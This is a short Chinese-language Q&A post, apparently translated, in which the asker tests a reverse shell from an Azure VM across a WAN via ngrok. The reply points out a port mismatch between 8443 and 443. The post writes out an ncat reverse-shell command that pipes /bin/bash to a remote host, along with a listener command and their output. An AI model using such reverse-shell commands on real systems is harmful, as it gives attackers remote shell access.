我创建了一个 Azure VM,并配置了一个 ngrok 服务器以使我的本地主机可从互联网访问,并且我将 VPN 放到 VM 上以模拟 WAN 攻击。
我想要设置到 VM 端口的 TCP 连接并创建反向 shell 以获取 root 访问权限。为了完成此任务,我使用了以下命令:
ncat 200..225 8443 -e /bin/bash -v
他的输出是: Ncat: Connected to 200.225:443
。
但是当我尝试监听连接以打开 shell 时 ncat -l 8443 -v
,它只是保持监听状态并且不建立连接:
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on:::8443
Ncat: Listening on 0.0.0.0:8443
当两台机器都在同一个局域网中时,我进行了这个测试,它运行良好。但在广域网目标中它不起作用。
所以我的问题是:您知道 ncat 如何在 wan 之外建立连接并设置反向 shell 吗?
答案1
您的 netcat 正在监听端口 8443
您正在连接到端口 443
这些是不同的端口。